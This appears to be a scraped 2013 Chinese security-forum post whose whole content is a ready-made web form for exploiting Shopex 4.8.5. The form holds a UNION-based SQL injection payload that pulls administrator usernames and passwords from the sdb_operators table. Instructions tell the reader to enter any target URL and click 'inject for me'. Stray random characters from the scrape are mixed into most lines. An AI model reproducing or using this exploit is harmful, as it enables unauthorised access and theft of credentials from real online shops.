<center>8 U3 S- \5 p+ \: Z9 m# X
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>! J4 N! V7 G6 [- A
<form action="" method="post" name="submit_url">! n1 B( \. T; d8 E. }. y; x/ D2 e
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
# y& \: m+ a" H<input type="hidden" name="goods[goods_id]" value="3">7 Z# G H( L$ E* W, G8 S7 Y
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
9 N# r& ~ `# z! X3 a( }1 G0 A<input type="submit" value="给我注入" onclick=fsubmit()>
2 ]/ a- ~3 n! m/ F" `</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com- n6 i: I5 l- H, a0 S- ^
# u% y0 I. B3 d: p<script>
1 p9 S+ c7 [+ ]& F& l5 ffunction fsubmit(){ ) H( N9 ^0 ^3 ^3 t+ K
form = document.forms[0]; . J' u8 ?' M- w3 }8 L
form.action = form.url.value+'/?product-gnotify'; " z4 Y# o b0 [. F4 z* D6 X
form.submit();
, N$ h. Z3 |8 u% N} # \* Z) o3 {" D; P2 w' E# O$ H
</script>
. A# M' s7 Y( A |
发表于 2013-1-23 09:20:52
收藏
支持
反对